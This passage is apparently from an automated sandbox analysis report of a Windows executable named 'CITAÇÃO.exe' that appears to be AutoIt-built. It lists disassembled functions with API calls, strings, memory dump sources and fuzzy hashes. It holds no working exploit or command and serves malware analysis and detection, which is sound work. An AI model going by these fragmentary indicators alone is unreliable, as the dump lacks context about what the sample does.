                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                                      • String ID: aeB
                                                      • API String ID: 857135153-906807131
                                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                      Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy
                                                      • String ID: ^B$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 1735881322-2289546076
                                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                      Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                      • PostMessageW.USER32(00000000), ref: 00441C05
                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                      • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                      • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                      • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                      Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                      Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Message_doexit
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 1993061046-4017498283
                                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D